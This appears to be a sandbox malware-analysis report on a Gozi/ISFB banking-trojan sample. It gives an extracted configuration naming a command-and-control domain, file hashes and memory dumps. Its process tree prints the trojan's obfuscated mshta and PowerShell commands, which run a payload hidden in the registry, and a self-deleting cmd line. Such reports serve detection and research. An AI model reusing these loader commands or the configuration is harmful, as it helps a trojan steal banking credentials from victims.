gozi | 40bbc905f9521a2892abf91df0ed1678caf43be3c05f2aaf4192707d84f94665

Analysis

max time kernel
150s
max time network
130s
platform
windows10-1703_x64
resource
win10-20230915-en
resource tags

arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system
submitted
13-10-2023 01:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

url/modulo.url
Size

204B
MD5

5ece85d608cc6f3fc7250c0a609241eb
SHA1

cadac53fa389635eac3ae62291d9022b06f8e801
SHA256

8636389e0cb65ea3dc6f46c33ad78d2b03601a3eec7945586920a4f7581e9792
SHA512

2b3f771cb4556412aea1f87fc1d06b35673739fac17b7bffcd988a245ccf67ab8208699adb07f527739df2cc493ccb2bf32a78de08a8d75ee4af8e9e28ae7ef6

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

fotexion.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

fotexion.com

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

8 168 rundll32.exe
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

168 rundll32.exe

flow	pid	process
8	168	rundll32.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 1056 set thread context of 3132	1056	powershell.exe	Explorer.EXE
PID 3132 set thread context of 3772	3132	Explorer.EXE	RuntimeBroker.exe
PID 3132 set thread context of 3276	3132	Explorer.EXE	cmd.exe
PID 3276 set thread context of 1924	3276	cmd.exe	PING.EXE
PID 3132 set thread context of 428	3132	Explorer.EXE	WinMail.exe
PID 3132 set thread context of 1244	3132	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

rundll32.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1384669652-2270756765-572751751-1000_Classes\Local Settings rundll32.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1924 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

1924 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1384669652-2270756765-572751751-1000_Classes\Local Settings	rundll32.exe

pid	process
1924	PING.EXE

pid	process
1924	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

rundll32.exepowershell.exeExplorer.EXE

pid	process
168	rundll32.exe
168	rundll32.exe
1056	powershell.exe
1056	powershell.exe
1056	powershell.exe
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE
3132	Explorer.EXE

Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

1056 powershell.exe
3132 Explorer.EXE
3132 Explorer.EXE
3276 cmd.exe
3132 Explorer.EXE
3132 Explorer.EXE

pid	process
1056	powershell.exe
3132	Explorer.EXE
3132	Explorer.EXE
3276	cmd.exe
3132	Explorer.EXE
3132	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 13 IoCs

Processes:

powershell.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	1056	powershell.exe
Token: SeShutdownPrivilege	3132	Explorer.EXE
Token: SeCreatePagefilePrivilege	3132	Explorer.EXE
Token: SeShutdownPrivilege	3132	Explorer.EXE
Token: SeCreatePagefilePrivilege	3132	Explorer.EXE
Token: SeShutdownPrivilege	3132	Explorer.EXE
Token: SeCreatePagefilePrivilege	3132	Explorer.EXE
Token: SeShutdownPrivilege	3132	Explorer.EXE
Token: SeCreatePagefilePrivilege	3132	Explorer.EXE
Token: SeShutdownPrivilege	3132	Explorer.EXE
Token: SeCreatePagefilePrivilege	3132	Explorer.EXE
Token: SeShutdownPrivilege	3132	Explorer.EXE
Token: SeCreatePagefilePrivilege	3132	Explorer.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

rundll32.exe

pid process

4888 rundll32.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

3132 Explorer.EXE

pid	process
4888	rundll32.exe

pid	process
3132	Explorer.EXE

Suspicious use of WriteProcessMemory 46 IoCs

Processes:

rundll32.execontrol.exerundll32.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 4888 wrote to memory of 992	4888	rundll32.exe	control.exe
PID 4888 wrote to memory of 992	4888	rundll32.exe	control.exe
PID 992 wrote to memory of 4816	992	control.exe	rundll32.exe
PID 992 wrote to memory of 4816	992	control.exe	rundll32.exe
PID 4816 wrote to memory of 168	4816	rundll32.exe	rundll32.exe
PID 4816 wrote to memory of 168	4816	rundll32.exe	rundll32.exe
PID 4816 wrote to memory of 168	4816	rundll32.exe	rundll32.exe
PID 876 wrote to memory of 1056	876	mshta.exe	powershell.exe
PID 876 wrote to memory of 1056	876	mshta.exe	powershell.exe
PID 1056 wrote to memory of 4464	1056	powershell.exe	csc.exe
PID 1056 wrote to memory of 4464	1056	powershell.exe	csc.exe
PID 4464 wrote to memory of 5040	4464	csc.exe	cvtres.exe
PID 4464 wrote to memory of 5040	4464	csc.exe	cvtres.exe
PID 1056 wrote to memory of 4940	1056	powershell.exe	csc.exe
PID 1056 wrote to memory of 4940	1056	powershell.exe	csc.exe
PID 4940 wrote to memory of 4840	4940	csc.exe	cvtres.exe
PID 4940 wrote to memory of 4840	4940	csc.exe	cvtres.exe
PID 1056 wrote to memory of 3132	1056	powershell.exe	Explorer.EXE
PID 1056 wrote to memory of 3132	1056	powershell.exe	Explorer.EXE
PID 1056 wrote to memory of 3132	1056	powershell.exe	Explorer.EXE
PID 1056 wrote to memory of 3132	1056	powershell.exe	Explorer.EXE
PID 3132 wrote to memory of 3772	3132	Explorer.EXE	RuntimeBroker.exe
PID 3132 wrote to memory of 3772	3132	Explorer.EXE	RuntimeBroker.exe
PID 3132 wrote to memory of 3772	3132	Explorer.EXE	RuntimeBroker.exe
PID 3132 wrote to memory of 3772	3132	Explorer.EXE	RuntimeBroker.exe
PID 3132 wrote to memory of 3276	3132	Explorer.EXE	cmd.exe
PID 3132 wrote to memory of 3276	3132	Explorer.EXE	cmd.exe
PID 3132 wrote to memory of 3276	3132	Explorer.EXE	cmd.exe
PID 3132 wrote to memory of 3276	3132	Explorer.EXE	cmd.exe
PID 3132 wrote to memory of 3276	3132	Explorer.EXE	cmd.exe
PID 3276 wrote to memory of 1924	3276	cmd.exe	PING.EXE
PID 3276 wrote to memory of 1924	3276	cmd.exe	PING.EXE
PID 3276 wrote to memory of 1924	3276	cmd.exe	PING.EXE
PID 3276 wrote to memory of 1924	3276	cmd.exe	PING.EXE
PID 3276 wrote to memory of 1924	3276	cmd.exe	PING.EXE
PID 3132 wrote to memory of 428	3132	Explorer.EXE	WinMail.exe
PID 3132 wrote to memory of 428	3132	Explorer.EXE	WinMail.exe
PID 3132 wrote to memory of 428	3132	Explorer.EXE	WinMail.exe
PID 3132 wrote to memory of 428	3132	Explorer.EXE	WinMail.exe
PID 3132 wrote to memory of 428	3132	Explorer.EXE	WinMail.exe
PID 3132 wrote to memory of 1244	3132	Explorer.EXE	cmd.exe
PID 3132 wrote to memory of 1244	3132	Explorer.EXE	cmd.exe
PID 3132 wrote to memory of 1244	3132	Explorer.EXE	cmd.exe
PID 3132 wrote to memory of 1244	3132	Explorer.EXE	cmd.exe
PID 3132 wrote to memory of 1244	3132	Explorer.EXE	cmd.exe
PID 3132 wrote to memory of 1244	3132	Explorer.EXE	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3132
- C:\Windows\System32\rundll32.exe
  "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\url\modulo.url
  2⤵
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:4888
- - C:\Windows\System32\control.exe
    "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DZDMTHDJ\modulo[1].cpl",
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:992
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DZDMTHDJ\modulo[1].cpl",
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4816
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DZDMTHDJ\modulo[1].cpl",
        5⤵
        Blocklisted process makes network request
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:168
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" "about:<hta:application><script>R8uj='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(R8uj).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\C007E561-1FD8-F246-A9F4-C346ED68A7DA\\\GlobalPlay'));if(!window.flag)close()</script>"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:876
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jfniluaew -value gp; new-alias -name qfwumtjuw -value iex; qfwumtjuw ([System.Text.Encoding]::ASCII.GetString((jfniluaew "HKCU:Software\AppDataLow\Software\Microsoft\C007E561-1FD8-F246-A9F4-C346ED68A7DA").VirtualActive))
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1056
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ykapj10c\ykapj10c.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4464
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES56C1.tmp" "c:\Users\Admin\AppData\Local\Temp\ykapj10c\CSC72A320F9435740818BB7C115DB22771B.TMP"
        5⤵
        
        PID:5040
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ifvcygpo\ifvcygpo.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4940
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES57DA.tmp" "c:\Users\Admin\AppData\Local\Temp\ifvcygpo\CSC24F6306F4C96440EB7C926163C7A2680.TMP"
        5⤵
        
        PID:4840
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DZDMTHDJ\modulo[1].cpl"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:3276
- - C:\Windows\system32\PING.EXE
    ping localhost -n 5
    3⤵
    - Runs ping.exe
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1924
- C:\Program Files\Windows Mail\WinMail.exe
  "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
  2⤵
  PID:428
- C:\Windows\syswow64\cmd.exe
  "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
  2⤵
  PID:1244

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3772

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DZDMTHDJ\modulo[1].cpl

Filesize
206KB

MD5
72e2a5c797954e895a41be5b20f867b2

SHA1
419aacfb3ccea9b08277bcc9405054fa4238a597

SHA256
858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0

SHA512
77be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES56C1.tmp

Filesize
1KB

MD5
bed8c0724573de211e3333f306304ae7

SHA1
af6f8217a2552ad2de29cf1a71167a6c86749b1e

SHA256
6cc81ee6c9a5d421d448f2436c24f1754f3d57da8d01ec75b0133d2d291f5f6a

SHA512
1da9fa4b115afd7509fb69f330f899bfef4734cb8bb0a1c3cca1ebcd5a8f5cc90919e429ee1ef5deec88c26d07ea6eb87aef425267d3295c604b3ab5325d7132

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES57DA.tmp

Filesize
1KB

MD5
3e88bd2a25dc8a9be39132030745150b

SHA1
adcd1ba6ea6fc763708ca8e4a7eef27006920f19

SHA256
c16afef3b72ceab4b727597ee0637cc3d596e491a23f71da00669db10e1dd4a6

SHA512
643b0c4c5d1e8762397ed791291dceb4bdd744e3ac2befa61217a5c20122f3f54731cf75c2cd61e6f7d451e3a39d1d3d3698cd279f5d7330a7c8de4fa956dc78

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iwnmwdva.ljo.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ifvcygpo\ifvcygpo.dll

Filesize
3KB

MD5
c5409169bae87fc0a168c16cbe645f0c

SHA1
8565664dbb68c402d86fbc08966a8b88348ddb7f

SHA256
a64accff4db8d9b7f6d65f238ed69d19853dc4b4314b596aca2a5d4cbc522e77

SHA512
eb29f1fafdf675bb1db348cd43ab8aaa6a2d37293662bdbc3f57c35325e9b50e99c98208dc4967c34e4dce8b01e22dd443d093ba735b931d36b9ccfafb383ec6

Download Submit
C:\Users\Admin\AppData\Local\Temp\ykapj10c\ykapj10c.dll

Filesize
3KB

MD5
0d142972c7ada4297bd0be849d7388a9

SHA1
21754ae4b6cf329e2b36eff466144004512d494c

SHA256
b90a313e9f3dfc052b965c79f7cfb05b8acccc38a39d2eb30c694afd36ec46d0

SHA512
5a1d94d88e772f6caecb399be3436df9f084fc24cf264031fbc6617ca5684cb813dbb240115365467b303248279a1d173e507d310f14800672f80b4fcb9c1f78

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ifvcygpo\CSC24F6306F4C96440EB7C926163C7A2680.TMP

Filesize
652B

MD5
41c281e352c89e97486ba70a7edb7f3f

SHA1
4d021f793ceb3ce96962a337388c90311b766bd8

SHA256
8598863fc860eadddf305596d7f9efa547538b01a00cfd77537c08d28526e054

SHA512
02cfe99973d8c4f460d5c20fbb4048dc051c4e9685ab388890960c41b13cbfbb82b3c1f4f7ca1bdde4e1a3acb314a62d1de4369c0a83acc0b9c19937d1c23f4f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ifvcygpo\ifvcygpo.0.cs

Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ifvcygpo\ifvcygpo.cmdline

Filesize
369B

MD5
3ac55eedfd49b06e3f0e404eb5b63264

SHA1
35b344ffbd1b551685c4f2f97874b4b911b6d661

SHA256
9d3bc5d417a87c5a413129b53334739a1ad0b8082dc47334226e51de6c0625d8

SHA512
1c34016d95d719d057d21d6ce644ed122fc9ef8a95dbb48df82440672968964b49fb6cd183966c0c08d337870c977acadd71167678733f3c1dcef3c275db4088

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ykapj10c\CSC72A320F9435740818BB7C115DB22771B.TMP

Filesize
652B

MD5
e969c3edce8e2e6924b976d4ab86ab24

SHA1
5c2f6eca8c0fac2daf55414acab2131a8e625716

SHA256
e92c23e89d7bff5afa60923c304463343ef50155f543c1272ee5a544a0ca8b2b

SHA512
fa4d704d63d8739d4ce53064819074090406a187b710d3c89a65c144d8e3f297be9233cb801649b07065c4c383b0e5e5d63c9433071c3a78dc18dee7d15b2808

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ykapj10c\ykapj10c.0.cs

Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ykapj10c\ykapj10c.cmdline

Filesize
369B

MD5
b1af980145bf7e27fa3d3eb5583e884d

SHA1
91dcadbca9875ed132648b250fa0d449fb71279d

SHA256
7b59c9d44d682889f5ca7af54f2f79df2950c5c93e2d045c2564da662d07d7c0

SHA512
9a39aed98b26ee4840aa20b90279a37f0b40f0ee5a6354bc31687056d8bac30a92c224476ddc045a0d8f1a9046fab81f2cfdda0a5f4904245dbf37dc3e569094

Download Submit
\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DZDMTHDJ\modulo[1].cpl

Filesize
206KB

MD5
72e2a5c797954e895a41be5b20f867b2

SHA1
419aacfb3ccea9b08277bcc9405054fa4238a597

SHA256
858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0

SHA512
77be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3

Download Submit
memory/168-8-0x00000000029A0000-0x00000000029AD000-memory.dmp

Filesize
52KB

Download
memory/168-116-0x00000000028F0000-0x00000000028FE000-memory.dmp

Filesize
56KB

Download
memory/168-6-0x00000000028B0000-0x00000000028D9000-memory.dmp

Filesize
164KB

Download
memory/168-7-0x00000000028F0000-0x00000000028FE000-memory.dmp

Filesize
56KB

Download
memory/168-11-0x00000000028F0000-0x00000000028FE000-memory.dmp

Filesize
56KB

Download
memory/428-120-0x000001CE238A0000-0x000001CE23944000-memory.dmp

Filesize
656KB

Download
memory/428-122-0x000001CE21FB0000-0x000001CE21FB1000-memory.dmp

Filesize
4KB

Download
memory/428-128-0x000001CE238A0000-0x000001CE23944000-memory.dmp

Filesize
656KB

Download
memory/1056-89-0x00007FFEAC610000-0x00007FFEACFFC000-memory.dmp

Filesize
9.9MB

Download
memory/1056-90-0x00000248FF810000-0x00000248FF84D000-memory.dmp

Filesize
244KB

Download
memory/1056-71-0x00000248FF6D0000-0x00000248FF6E0000-memory.dmp

Filesize
64KB

Download
memory/1056-73-0x00000248FF810000-0x00000248FF84D000-memory.dmp

Filesize
244KB

Download
memory/1056-55-0x00000248FF7E0000-0x00000248FF7E8000-memory.dmp

Filesize
32KB

Download
memory/1056-24-0x00000248FF860000-0x00000248FF8D6000-memory.dmp

Filesize
472KB

Download
memory/1056-69-0x00000248FF800000-0x00000248FF808000-memory.dmp

Filesize
32KB

Download
memory/1056-20-0x00007FFEAC610000-0x00007FFEACFFC000-memory.dmp

Filesize
9.9MB

Download
memory/1056-21-0x00000248FF6D0000-0x00000248FF6E0000-memory.dmp

Filesize
64KB

Download
memory/1056-19-0x00000248FF640000-0x00000248FF662000-memory.dmp

Filesize
136KB

Download
memory/1244-134-0x0000000002E70000-0x0000000002E71000-memory.dmp

Filesize
4KB

Download
memory/1244-133-0x0000000003390000-0x0000000003428000-memory.dmp

Filesize
608KB

Download
memory/1244-140-0x0000000003390000-0x0000000003428000-memory.dmp

Filesize
608KB

Download
memory/1924-112-0x000002CAA0D30000-0x000002CAA0DD4000-memory.dmp

Filesize
656KB

Download
memory/1924-113-0x000002CAA0AB0000-0x000002CAA0AB1000-memory.dmp

Filesize
4KB

Download
memory/1924-143-0x000002CAA0D30000-0x000002CAA0DD4000-memory.dmp

Filesize
656KB

Download
memory/3132-75-0x0000000003120000-0x00000000031C4000-memory.dmp

Filesize
656KB

Download
memory/3132-136-0x0000000003120000-0x00000000031C4000-memory.dmp

Filesize
656KB

Download
memory/3132-76-0x0000000001290000-0x0000000001291000-memory.dmp

Filesize
4KB

Download
memory/3276-105-0x00000168FC260000-0x00000168FC261000-memory.dmp

Filesize
4KB

Download
memory/3276-104-0x00000168FC500000-0x00000168FC5A4000-memory.dmp

Filesize
656KB

Download
memory/3276-142-0x00000168FC500000-0x00000168FC5A4000-memory.dmp

Filesize
656KB

Download
memory/3772-92-0x0000022FD5340000-0x0000022FD53E4000-memory.dmp

Filesize
656KB

Download
memory/3772-93-0x0000022FD36F0000-0x0000022FD36F1000-memory.dmp

Filesize
4KB

Download
memory/3772-141-0x0000022FD5340000-0x0000022FD53E4000-memory.dmp

Filesize
656KB

Download